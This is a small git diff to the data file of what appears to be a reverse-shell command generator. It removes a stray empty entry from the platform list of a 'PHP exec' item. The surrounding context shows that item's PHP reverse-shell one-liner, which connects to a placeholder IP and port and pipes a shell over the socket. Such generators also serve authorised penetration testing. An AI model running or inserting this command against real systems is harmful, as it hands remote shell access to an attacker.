diff --git a/js/data.js b/js/data.js index a8a5704..fe300a4 100644 --- a/js/data.js +++ b/js/data.js @@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType( { "name": "PHP exec", "command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'", - "meta": ["linux", , "mac"] + "meta": ["linux", "mac"] }, { "name": "PHP shell_exec",